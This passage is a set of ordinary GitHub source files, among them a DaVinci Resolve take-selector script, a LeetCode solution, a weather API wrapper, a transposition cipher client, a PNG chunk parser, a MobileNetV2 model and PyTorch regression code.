clipname, takes_count]\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = str(marker_list[6])\n itRow.Text[2] = 
str(frames_to_timecode(int(marker_list[0])+start_tc, framerate, False))\n                itRow.Text[3] = str(marker_list[7])\n                itRow.Text[4] = str(marker_list[1])\n                itRow.Text[5] = str(marker_list[4])\n                itRow.Text[6] = str(marker_list[3])\n                itm['tree'].AddTopLevelItem(itRow)\n                print (marker_list)\n            itm['tree'].SortByColumn(2, \"AscendingOrder\")\n        else:\n            if color == color_filter or color_filter == 'All':\n                i= i + 1\n                marker_list = [mk_frameId, color, duration, note, name, customData, clipname, takes_count]\n                itRow = itm['tree'].NewItem()\n                itRow.Text[0] = str(i)\n                itRow.Text[1] = str(marker_list[6])\n                itRow.Text[2] = str(frames_to_timecode(int(marker_list[0])+start_tc, framerate, False))\n                itRow.Text[3] = str(marker_list[7])\n                itRow.Text[4] = str(marker_list[1])\n                itRow.Text[5] = str(marker_list[4])\n                itRow.Text[6] = str(marker_list[3])\n                itm['tree'].AddTopLevelItem(itRow)\n                print (marker_list)\n            itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\ndef _read_timeline_items():\n    trackcount = this_timeline().GetTrackCount(\"video\")\n    TimelineItem = []\n    for i in range(1, trackcount + 1):\n        # list.extend() returns None, so reassigning crashed on the second track; mutate in place instead\n        TimelineItem.extend(this_timeline().GetItemListInTrack(\"video\", i))\n    return TimelineItem\n\ndef _clicked(ev):\n    print(str(ev['item'].Text[2]))\n    x = str(ev['item'].Text[2])\n    this_timeline().SetCurrentTimecode(x) \n\ndef _selected(ev):\n    selected_item = itm['tree'].SelectedItems()\n    return selected_item\n\ndef _apply_filter(ev):\n    color = itm['color_list'].CurrentText\n    read_marker_color(color)\n\ndef _refresh_filter(ev):\n    color = itm['color_list'].CurrentText\n    if refresher == '0':\n        read_marker_color(color)\n    if refresher == '1':\n        read_all_timeline_clips(ev)\n\ndef main_ui(ui):\n    window01 = ui.VGroup({\"Spacing\": 10,},[\n        ui.HGroup({\"Spacing\": 10, \"Weight\": 7,},[ \n            ui.Tree({\n                'ID': 'tree',\n                'SortingEnabled': True,\n                'SelectionMode': 'ExtendedSelection',\n                'Events': {\n                    'ItemDoubleClicked': True,\n                    'ItemClicked': True}}),\n            ]),\n        ui.HGroup({\"Spacing\": 10, \"Weight\": 5,},[ \n            ui.Tree({\n                'ID': 'current_tree',\n                'SortingEnabled': True,\n                'SelectionMode': 'ExtendedSelection',\n                'Events': {\n                    'ItemDoubleClicked': True,\n                    'ItemClicked': True}\n                }),\n            ]),\n        ui.HGroup({\"Spacing\": 7, \"Weight\": 0,},[\n            ui.Label({ \"ID\": \"filter_text\",\"Text\": \"Marker Filter Color\",\"Weight\": 0}),\n            ui.ComboBox({ \"ID\": \"color_list\",\"Weight\": 2}),\n            ui.VGap({\"Weight\": 2}),\n            ui.Button({ \"ID\": \"filter_color\", \"Text\": \"Apply\",\"Weight\": 0}),\n            ui.Button({ \"ID\": \"reset_filter\", \"Text\": \"Show All\",\"Weight\": 0}),\n            ui.Button({ \"ID\": \"refresh\", \"Text\": \"Refresh\",\"Weight\": 0}),\n            ]),\n        ui.HGroup({\"Spacing\": 7, \"Weight\": 0,},[\n            ui.CheckBox({ \"ID\": \"takes_only\", \"Text\": \"Only show clips with multiple takes\", \"Weight\": 0}),\n            ui.VGap({\"Weight\": 2}),\n            ui.CheckBox({ \n\t\t\t\"ID\": \"show_take\", \n\t\t\t\"Text\": \"Auto Track Takes\",\n\t\t\t\"Weight\": 1,\n\t\t\t\"AutoRepeat\": True,\n\t\t\t\"AutoRepeatInterval\": 1500,\n\t\t\t\"AutoRepeatDelay\": 2000,\n\t\t\t\"Down\": True,\n            'Events': {\n                'Toggled': True,\n                'SetDown': True,\n                'SetAutoRepeat': True,\n                'Update': True,}}),\n            ui.Button({ \"ID\": \"previous_take\", \"Text\": \"Previous Take\",\"Weight\": 0}),\n            ui.Button({ \"ID\": \"next_take\", \"Text\": \"Next Take\",\"Weight\": 0}),\n            ])\n        ])\n    return window01\n\nif __name__ == '__main__':\n\n    window_01 = main_ui(ui)\n\n    dlg = disp.AddWindow({ \n        \"WindowTitle\": \"Take Selector V1.4\", \n        \"ID\": \"MyWin\", \n        'WindowFlags': {\n            'Window': True,\n            'WindowStaysOnTopHint': True,\n            
},\n 'Events': {\n 'ContextMenu': True,\n 'FocusOut': True,\n 'Close': True},\n \"Geometry\": [ \n 800, 700, \n 700, 430\n ],\n },\n window_01)\n\n itm = dlg.GetItems()\n\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Name'\n mrk.Text[2] = 'Record In'\n mrk.Text[3] = 'Record Out'\n mrk.Text[4] = 'Takes'\n itm['tree'].SetHeaderItem(mrk)\n itm['tree'].ColumnCount = 5\n\n itm['tree'].ColumnWidth[0] = 75\n itm['tree'].ColumnWidth[1] = 200\n itm['tree'].ColumnWidth[2] = 100\n itm['tree'].ColumnWidth[3] = 100\n itm['tree'].ColumnWidth[4] = 50\n\n crt = itm['current_tree'].NewItem()\n crt.Text[0] = 'ID'\n crt.Text[1] = 'Reel Name'\n crt.Text[2] = 'Record In'\n crt.Text[3] = 'Record Out'\n crt.Text[4] = 'Takes'\n crt.Text[5] = 'Date Added'\n itm['current_tree'].SetHeaderItem(crt)\n itm['current_tree'].ColumnCount = 6\n\n itm['current_tree'].ColumnWidth[0] = 75\n itm['current_tree'].ColumnWidth[1] = 200\n itm['current_tree'].ColumnWidth[2] = 100\n itm['current_tree'].ColumnWidth[3] = 100\n itm['current_tree'].ColumnWidth[4] = 50\n itm['current_tree'].ColumnWidth[5] = 200\n\n trackcount = this_timeline().GetTrackCount(\"video\")\n i = 0\n TimelineDict = get_all_timeline_items()\n if itm['takes_only'].Checked == True:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n takes_count = item.GetTakesCount()\n if enable_check == True and takes_count > 1:\n i= i + 1\n mrk.Text[1] = 'Reel Name'\n mrk.Text[5] = 'Date Added'\n itm['tree'].ColumnCount = 6\n itm['tree'].ColumnWidth[5] = 200\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetMediaPoolItem().GetClipProperty('Reel Name')\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(takes_count)\n itRow.Text[5] = str(item.GetMediaPoolItem().GetClipProperty('Date Added'))\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n else:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n if enable_check == True:\n i= i + 1\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetName()\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(item.GetTakesCount())\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\n itm['color_list'].AddItems(marker_color)\n\n dlg.On.filter_color.Clicked = _apply_filter\n dlg.On.reset_filter.Clicked = read_all_timeline_clips\n dlg.On.refresh.Clicked = _refresh_filter\n dlg.On.current_tree.ItemDoubleClicked = _double_click\n dlg.On.previous_take.Clicked = _previous_take\n dlg.On.next_take.Clicked = _next_take\n dlg.On.show_take.Toggled = _show_takes\n dlg.On.tree.ItemDoubleClicked = _clicked\n dlg.On.tree.ItemClicked = _selected\n dlg.On.MyWin.Close = _exit\n\n dlg.Show()\n disp.RunLoop()\n dlg.Hide()\n\n\n","repo_name":"qiuboujun/Script","sub_path":"Take_Selector_V1.4.py","file_name":"Take_Selector_V1.4.py","file_ext":"py","file_size_in_byte":23714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32981494407","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n#\n# Example 1:\n#\n# Input: \"hello\"\n# Output: \"holle\"\n# Example 2:\n#\n# 
Input: \"leetcode\"\n# Output: \"leotcede\"\n# Note:\n# The vowels does not include the letter \"y\".\n\nclass Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n if not s or len(s) < 2:\n return s\n l = list(s)\n length = len(l)\n vowels = set(['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n i, j = 0, length - 1\n while i < j:\n if l[i] not in vowels:\n i += 1\n continue\n if l[j] not in vowels:\n j -= 1\n continue\n if i < j:\n self.swap(l, i, j)\n i += 1\n j -= 1\n return ''.join(l)\n\n def swap(self, l, i, j):\n temp = l[i]\n l[i] = l[j]\n l[j] = temp\n\n\ns = Solution()\nprint(s.reverseVowels(\"leetcode\"))\n","repo_name":"yshshadow/Leetcode","sub_path":"300-/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19021478546","text":"import re\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom particle import Particle\n\ndef particle_to_latex(pdgid):\n pdgid = int(pdgid)\n try:\n return ' '+Particle.from_pdgid(pdgid).latex_name\n except:\n if pdgid==20423:\n return 'D_{1}(2430)^{0}'\n elif pdgid==-20423:\n return '\\\\bar{D}_{1}(2430)^{0}'\n elif pdgid==20413:\n return 'D_{1}(H)^{+}'\n elif pdgid==-20413:\n return 'D_{1}(H)^{-}'\n elif pdgid==10413:\n return 'D_{1}(2420)^{+}'\n elif pdgid==-10413:\n return 'D_{1}(2420)^{-}'\n elif pdgid==5214:\n return '\\\\Sigma*_{b}^{0}'\n elif pdgid==-5214:\n return '\\\\bar{\\\\Sigma}*_{b}^{0}'\n elif pdgid==5212:\n return '\\\\Sigma_{b}^{0}'\n elif pdgid==-5212:\n return '\\\\bar{\\\\Sigma}*_{b}^{0}'\n elif pdgid==5314:\n return '\\\\Xi*_{b}^{-}'\n elif pdgid==-5314:\n return '\\\\Xi*_{b}^{+}'\n elif pdgid==5312:\n return \"\\\\Xi'_{b}^{-}\"\n elif pdgid==-5312:\n return \"\\\\Xi'_{b}^{+}\"\n print('pdg not found', pdgid) \n return ' %d'%pdgid\n# import pdb ; pdb.set_trace()\n\ndef relabel(label):\n newlabel = r'$'\n pdgid = ''\n for i in label:\n if i == '(':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n newlabel += '(\\\\rightarrow '\n pdgid = ''\n elif i == ')':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n newlabel += ')'\n pdgid = ''\n elif i == ',':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n pdgid = ''\n else:\n pdgid += i\n return newlabel+'$'\n\n# ff = open('decay_with_stars.pkl')\n# ff = open('decay.pkl')\n# ff = open('decay_no_acceptance.pkl')\n# ff = open('decay_no_acceptance_fullstat.pkl')\nff = open('decay_no_acceptance_fullstat_test.pkl')\ndecays = pickle.load(ff)\nff.close()\n\nplt.rcdefaults()\n# fig, ax = plt.subplots(figsize=(100, 200))\n# fig, ax = plt.subplots(figsize=(18, 8))\n# fig, ax = plt.subplots(figsize=(18, 18))\n# fig, ax = plt.subplots(figsize=(18, 36))\n# fig, ax = plt.subplots(figsize=(18, 54))\n# fig, ax = plt.subplots(figsize=(18, 72))\n# fig, ax = plt.subplots(figsize=(22, 1500))\n# fig, ax = plt.subplots()\n\nalldecays = sorted(decays.items(), key=lambda x: x[1], reverse=True)\ntotal_events = np.sum(np.array([idecay[1] for idecay in alldecays]))\n# alldecays = alldecays[:25]\n# alldecays = alldecays[:50]\n# alldecays = alldecays[:100]\n\ndecays = [idecay[0] for idecay in alldecays] #list(alldecays.keys())\noccurrences = [idecay[1] for idecay in alldecays]\ny_pos = np.arange(len(decays))\nfrequency = np.array(occurrences).astype(np.float32)/total_events\nnewlabels = map(relabel, decays)\n\nprint('total decays', len(decays))\n\ncounter = 1\nfor ichunk in range(len(frequency)%100 + 
1):\n if counter > 4: break\n fig, ax = plt.subplots(figsize=(18, 54))\n print('doing chunk', counter)\n ini = ichunk*100\n fin = (ichunk+1)*100\n ax.barh(y_pos[ini:fin], frequency[ini:fin], align='center')\n for i, v in enumerate(frequency[ini:fin]):\n ax.text(v, i, '%.3f%s'%(100.*v, '%'), color='black', fontweight='bold')\n ax.set_yticks(y_pos[ini:fin])\n # ax.set_yticklabels(map(relabel, decays))\n ax.set_yticklabels(newlabels[ini:fin])\n ax.invert_yaxis() # labels read top-to-bottom\n ax.set_xlabel('Frequency')\n # ax.set_title(r'B hadron decays giving rise to $D*(2010)^{+}(\\rightarrow D^{0}(\\rightarrow K^{-}\\pi^{+})\\pi^{+})\\mu$ in the acceptance. Charge conjugation implied')\n ax.set_title(r'B hadron decays giving rise to $D*(2010)^{+}(\\rightarrow D^{0}(\\rightarrow K^{-}\\pi^{+})\\pi^{+})\\mu$. Charge conjugation implied')\n ax.set_xscale('log')\n # ax.set_aspect(aspect=10)\n # ax.set_xlim(300, 400)\n # ax.set_box_aspect(10)\n ax.margins(y=0.001)\n fig.tight_layout()\n\n # plt.savefig('decay_frequency_nicer.pdf')\n plt.savefig('alldecays/decay_frequency_no_acceptance_fullstat_chunk%d.pdf' %counter)\n plt.savefig('alldecays/decay_frequency_no_acceptance_fullstat_chunk%d.png' %counter)\n \n# fig.clf()\n \n counter += 1\n","repo_name":"lecriste/RDst","sub_path":"plot_decays.py","file_name":"plot_decays.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"41959444792","text":"import pyowm, json\nowm = pyowm.OWM('538cea50e439653ca98c8a8c1f5b6f8b')\n\n#make a class next time to add in self to each instanace\n#locations=['Sunnyvale, US', 'San Jose, US', 'Palo Alto, US', 'San Francisco, US', 'Oakland, US', 'Berkeley, US']\n#attributes=['temp', 'temp_min', 'temp_max', 'humidity']\n#weather_data = {} #a dict of dict to store weather data\n\nclass Weather:\n\tdef __init__(self):\n\t\t\"\"\"constructor\"\"\"\n\t\tself.sample = 'This is the weather main app from weather module'\n\n\tdef main(self):\n\t\t\"print the sample string\"\n\t\t#print(self.sample)\n\n\tdef collect_weather_data(self,locations, attributes, weather_data):\n\t\tfor city in locations:\n\t\t#get weather data from owm API\n\t\t\tweather = owm.weather_at_place(city)\n\t\t\ttemperature_1 = weather.get_weather()\n\t\t\ttemperature = temperature_1.get_temperature('fahrenheit')\n\t\t\thumidity_1 = weather.get_weather()\n\t\t\thumidity = humidity_1.get_humidity()\n\t\t#forecast data from owm API\n\t\t\tforecast = owm.daily_forecast(city)\n\t\t\tsun = forecast.will_have_sun()\n\t\t\train = forecast.will_have_rain()\n\t\t\tclouds = forecast.will_have_clouds()\n\t\t\tsnow = forecast.will_have_snow()\n\t\t#for each city, store its weather attributes into weather_data\n\t\t\tweather_data[city] = {}\n\t\t\tfor attribute in attributes:\n\t\t\t\tif attribute == 'humidity':\n\t\t\t\t\tweather_data[city][attribute] = str(humidity)\n\t\t\t\telif 'will_have' in attribute:\n\t\t\t\t\tif'sun' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(sun)\n\t\t\t\t\telif 'rain' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(rain)\n\t\t\t\t\telif 'clouds' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(clouds)\n\t\t\t\t\telse:\n\t\t\t\t\t#snow\n\t\t\t\t\t\tweather_data[city][attribute] = str(snow)\n\t\t\t\telse:\n\t\t\t\t\tweather_data[city][attribute] = str(temperature[attribute])\n\n\tdef print_weather_data(self, weather_data):\n\t\t\"\"\"Print Weather data\"\"\"\n\t\tcount = 1\n\t\tfor city, weather in 
weather_data.items():\n\t\t\tprint(count,city,'===>')\n\t\t\tfor attr, value in weather.items():\n\t\t\t\tprint(str(attr) + ':'+ str(value))\n\t\t\tcount = count + 1\n\n\tdef convert_to_json(self, weather_data):\n\t\t\"\"\"Convert weather data into readable json format\"\"\"\n\t\trow = {}\n\t\tfor city, weather in weather_data.items():\n\t\t\trow['location'] = city\n\t\t\trow.update({attr: value for attr, value in weather.items()})\n\t\t\t#print(row)\n\t\t\tj = json.dumps(row)\n\t\t\tprint(j)\n\tsample = 'Hello World!'\n'''\n\t\t#save this for unit testing\n\t\tprint(city + '===>')\n\t\tprint('Current temperature:' + str(temperature['temp']))\n\t\tprint('Minimum temperature:' + str(temperature['temp_min']))\n\t\tprint('Maximum temperature:' + str(temperature['temp_max']))\n\t\tprint('Humidity:' + str(humidity) + '%')\n'''\n","repo_name":"jonfang/Django_Weather","sub_path":"main_site/weather/lib/core/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44472456121","text":"#!/usr/bin/python3\n\nimport sys, getopt, requests\nfrom xml.etree.ElementTree import register_namespace, fromstring, ElementTree, Element, tostring\n\ndef update_odf(elem):\n for child in elem.getchildren():\n update_odf(child)\n tag = child.tag\n if (tag == '{http://www.opengroup.org/xsd/odf/1.0/}InfoItem') or (tag == '{http://www.opengroup.org/xsd/odf/1.0/}Object'):\n child.insert(1,Element('{http://www.opengroup.org/xsd/odf/1.0/}description'))\n if (tag == '{http://www.opengroup.org/xsd/odf/1.0/}InfoItem'):\n child.remove(child.find(\"./{http://www.opengroup.org/xsd/odf/1.0/}value\"))\n child.append(Element('{http://www.opengroup.org/xsd/odf/1.0/}MetaData'))\ndef main(argv):\n hostn = 'http://localhost:8080' #localhost at default port\n output = 'odfdump.xml' #default file\n try:\n opts, args = getopt.getopt(argv,\"ho:\")\n except getopt.GetoptError:\n print('getAllData.py -o host')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('getAllData.py -o host')\n sys.exit()\n elif opt == '-o':\n output = arg\n if len(args) >= 1:\n hostn = args[0]\n\n #request for odf hierarchy\n hierarchyRequest = \"\"\"\n \n \n \n \n \n\"\"\"\n #request for 9000 newest values(should be enough for now) \n fullRequest = \"\"\"\n \n \n \n \n\"\"\"\n\n\n #register namespaces so that we don't get wrong namespaces in the request\n register_namespace(\"omi\",\"omi.xsd\")\n register_namespace(\"odf\", \"odf.xsd\")\n register_namespace(\"\", \"http://www.w3.org/2001/XMLSchema-instance\")\n headers = {'Content-Type': 'application/xml'}\n\n #current hierarchy\n r = requests.post(hostn, data = hierarchyRequest, headers = headers).text\n\n root = fromstring(r)\n \n objects = root.find(\".//{http://www.opengroup.org/xsd/odf/1.0/}Objects\")\n #remove values and add metadata and description tags\n update_odf(objects)\n\n fullRoot = fromstring(fullRequest)\n\n fullRoot.find(\".//{http://www.opengroup.org/xsd/omi/1.0/}msg\").append(objects)\n\n #write result to file. 
note: result might be big so iterate over the result\n with open(output,'wb') as handle:\n r2 = requests.post(hostn, data = tostring(fullRoot, encoding=\"utf-8\"), headers = headers, stream = True)\n if not r2.ok:\n print(\"INVALID RESPONSE\")\n for block in r2.iter_content(1024):\n handle.write(block)\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"AaltoAsia/O-MI","sub_path":"tools/getAllData.py","file_name":"getAllData.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"35280333443","text":"\"\"\"empty message\n\nRevision ID: b80bbb12beda\nRevises: e7c262b6f986\nCreate Date: 2022-11-10 16:11:36.578577\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Boolean, String\nfrom sqlalchemy.sql import column, table\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b80bbb12beda'\ndown_revision = 'e7c262b6f986'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('entities', sa.Column('corp_sub_type_code', sa.String(length=15), nullable=True))\n op.create_foreign_key('corp_subtype_fkey', 'entities', 'corp_types', ['corp_sub_type_code'], ['code'])\n corp_type_table = table('corp_types',\n column('code', String),\n column('description', String),\n column('default', Boolean)\n )\n op.bulk_insert(\n corp_type_table,\n [\n {'code': 'CC', 'description': 'BC Community Contribution Company', 'default': False}\n ]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('corp_subtype_fkey', 'entities', type_='foreignkey')\n op.drop_column('entities', 'corp_sub_type_code')\n op.execute(\"delete from corp_types where code in ('CC')\")\n # ### end Alembic commands ###\n","repo_name":"bcgov/sbc-auth","sub_path":"auth-api/migrations/versions/b80bbb12beda_add_entity_corp_sub_type.py","file_name":"b80bbb12beda_add_entity_corp_sub_type.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"27022673601","text":"from socket import socket\nimport math\n\nPORT = 8000\nHOST = \"127.0.0.1\"\n\nADDR = (HOST, PORT)\n\n_s = socket()\n_s.connect(ADDR)\n\nKEY = \"ABCD\"\n\ndef encrypt(message):\n col = len(KEY)\n\n ct = \"\"\n kidx = 0\n keyList = sorted(list(KEY))\n mlen = float(len(message))\n row = int(math.ceil(mlen/col))\n mlist = list(message)\n\n nullChar = int((row*col) - mlen)\n mlist.extend(\"_\"*nullChar)\n matrix = [mlist[i:i+col] for i in range(0, len(mlist), col)]\n\n for _ in range(col):\n currIdx = KEY.index(keyList[kidx])\n ct += \"\".join([row[currIdx] for row in matrix])\n kidx += 1\n\n return ct\n\n\n\ndef main():\n message = input(\"Enter the string: \")\n ct = encrypt(message).encode()\n print(f\"CT: {encrypt(message)}\")\n _s.send(ct)\n _s.close()\n\nmain()","repo_name":"Ajal333/NW-Lab","sub_path":"7_Transposition/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41589523937","text":"import struct # parsing PNG file\n\nclass TextChunkBase:\n \"\"\"\n text chunk base class\n \"\"\"\n \n def unpack_generator(self, chunk_data):\n data = chunk_data\n for byte in struct.iter_unpack(\"c\", data):\n yield byte[0]\n\n def 
get_data_from_chunk(self,chunk_data):\n        string = \"\"\n        data=[]\n        for byte in self.unpack_generator(chunk_data):\n            if byte == b'\\x00':\n                data.append(string)\n                string = \"\"\n            else:\n                char = byte.decode(self.ENCODING_TYPE)\n                string = string + char\n        data.append(string)\n        return data","repo_name":"bednarek-p/PNG-Parser","sub_path":"text_chunk_base_class.py","file_name":"text_chunk_base_class.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"37733470869","text":"import torch.nn as nn\nimport math\nimport torchvision\nimport torch\nfrom torch.nn import init  # needed by the init_weights methods below, which call init.kaiming_normal_ etc.\n\n\n__all__ = ['mobilenetv2']\nclass ECAAttention(nn.Module):\n\n    def __init__(self, kernel_size=3):\n        super().__init__()\n        self.gap=nn.AdaptiveAvgPool2d(1)\n        self.conv=nn.Conv1d(1,1,kernel_size=kernel_size,padding=(kernel_size-1)//2)\n        self.sigmoid=nn.Sigmoid()\n\n    def init_weights(self):\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                init.kaiming_normal_(m.weight, mode='fan_out')\n                if m.bias is not None:\n                    init.constant_(m.bias, 0)\n            elif isinstance(m, nn.BatchNorm2d):\n                init.constant_(m.weight, 1)\n                init.constant_(m.bias, 0)\n            elif isinstance(m, nn.Linear):\n                init.normal_(m.weight, std=0.001)\n                if m.bias is not None:\n                    init.constant_(m.bias, 0)\n\n    def forward(self, x):\n        y=self.gap(x) #bs,c,1,1\n        y=y.squeeze(-1).permute(0,2,1) #bs,1,c\n        y=self.conv(y) #bs,1,c\n        y=self.sigmoid(y) #bs,1,c\n        y=y.permute(0,2,1).unsqueeze(-1) #bs,c,1,1\n        return x*y.expand_as(x)\nclass ChannelAttention(nn.Module):\n    def __init__(self, in_planes, ratio=16):\n        super(ChannelAttention, self).__init__()\n        self.avg_pool = nn.AdaptiveAvgPool2d(1)\n        self.max_pool = nn.AdaptiveMaxPool2d(1)\n\n        self.fc1 = nn.Conv2d(in_planes, in_planes // 16, 1, bias=False)\n        self.relu1 = nn.ReLU()\n        self.fc2 = nn.Conv2d(in_planes // 16, in_planes, 1, bias=False)\n\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, x):\n        avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n        max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n        out = avg_out + max_out\n        return self.sigmoid(out)\n\nclass SpatialAttention(nn.Module):\n    def __init__(self, kernel_size=7):\n        super(SpatialAttention, self).__init__()\n\n        assert kernel_size in (3, 7), 'kernel size must be 3 or 7'\n        padding = 3 if kernel_size == 7 else 1\n\n        self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, x):\n        avg_out = torch.mean(x, dim=1, keepdim=True)\n        max_out, _ = torch.max(x, dim=1, keepdim=True)\n        x = torch.cat([avg_out, max_out], dim=1)\n        x = self.conv1(x)\n        return self.sigmoid(x)\nclass CBAMBlock(nn.Module):\n\n    def __init__(self, channel=320,reduction=16,kernel_size=49):\n        super().__init__()\n        self.ca=ChannelAttention(in_planes=channel)\n        self.sa=SpatialAttention()\n\n\n    def init_weights(self):\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                init.kaiming_normal_(m.weight, mode='fan_out')\n                if m.bias is not None:\n                    init.constant_(m.bias, 0)\n            elif isinstance(m, nn.BatchNorm2d):\n                init.constant_(m.weight, 1)\n                init.constant_(m.bias, 0)\n            elif isinstance(m, nn.Linear):\n                init.normal_(m.weight, std=0.001)\n                if m.bias is not None:\n                    init.constant_(m.bias, 0)\n\n    def forward(self, x):\n        b, c, _, _ = x.size()\n        residual=x\n        out=x*self.ca(x)\n        out=out*self.sa(out)\n        return out+residual\nclass MobileNetV2(nn.Module):\n    __factory = {\n        320: torchvision.models.mobilenet_v2,\n    }\n    def __init__(self, depth = 320,num_classes=1000, width_mult=1.0, 
pretrained=True,matconvnet = None,cut_at_pooling=False):\n super(MobileNetV2, self).__init__()\n self.pretrained = pretrained\n self.matconvnet = matconvnet\n # setting of inverted residual blocks\n mobilenet_v2 = MobileNetV2.__factory[depth](pretrained=pretrained)\n self.feature_dim = 320\n self.cut_at_pooling = cut_at_pooling\n layers = list(mobilenet_v2.features.children())[:-1]\n #layers.append(CBAMBlock())\n self.features = nn.Sequential(*layers) # capture only feature part and remove last relu and maxpool\n self.gap = nn.AdaptiveMaxPool2d(1)\n # building last several layers\n #output_channel = _make_divisible(1280 * width_mult, 4 if width_mult == 0.1 else 8) if width_mult > 1.0 else 1280\n #self.conv = conv_1x1_bn(input_channel, output_channel)\n #self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n #self.classifier = nn.Linear(output_channel, num_classes)\n \n self._init_params()\n\n def forward(self, x):\n x = self.features(x)\n if self.cut_at_pooling:\n return x\n pool_x = self.gap(x)\n pool_x = pool_x.view(pool_x.size(0), -1)\n\n return pool_x, x\n # x = self.conv(x)\n # x = self.avgpool(x)\n # x = x.view(x.size(0), -1)\n # x = self.classifier(x)\n def _init_params(self):\n # optional load pretrained weights from matconvnet\n if self.matconvnet is not None:\n self.features.load_state_dict(torch.load(models_zoo.load_url('https://download.pytorch.org/models/mobilenet_v2-b0353104.pth')))\n self.pretrained = True\n \n #for m in self.modules():\n # if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. / n))\n # if m.bias is not None:\n # m.bias.data.zero_()\n # elif isinstance(m, nn.BatchNorm2d):\n # m.weight.data.fill_(1)\n # m.bias.data.zero_()\n # elif isinstance(m, nn.Linear):\n # m.weight.data.normal_(0, 0.01)\n # m.bias.data.zero_()\n\ndef mobilenetv2(**kwargs):\n \"\"\"\n Constructs a MobileNet V2 model\n \"\"\"\n return MobileNetV2(depth = 320,**kwargs)","repo_name":"ChenHuang20/OpenIBL-plus","sub_path":"ibl/models/mobilenet_v2.py","file_name":"mobilenet_v2.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21550737468","text":"import torch \r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch import nn,optim\r\n\r\n\r\n\r\nclass withPytorch(torch.nn.Module):\r\n def __init__(self,input_size,output_size):\r\n super(withPytorch, self).__init__()\r\n self.linear = nn.Linear(input_size, output_size)\r\n self.creterionLoss=torch.nn.MSELoss()\r\n\r\n def forward(self, x):\r\n yhat = self.linear(x)\r\n return yhat\r\n def loss(self,y,yhat):\r\n return torch.mean((y-yhat)**2)\r\n \r\n\r\n\r\nclass basiclr1DModel():\r\n \r\n def __init__(self,lr=0.1):\r\n self.w=torch.randn(1).requires_grad_()\r\n self.b=torch.randn(1).requires_grad_()\r\n self.lr=lr\r\n def forward(self, x):\r\n yhat=self.w*x + self.b\r\n return yhat\r\n\r\n def loss(self,yhat,y):\r\n return torch.mean((yhat-y)**2)\r\n def fit(self,x,y):\r\n 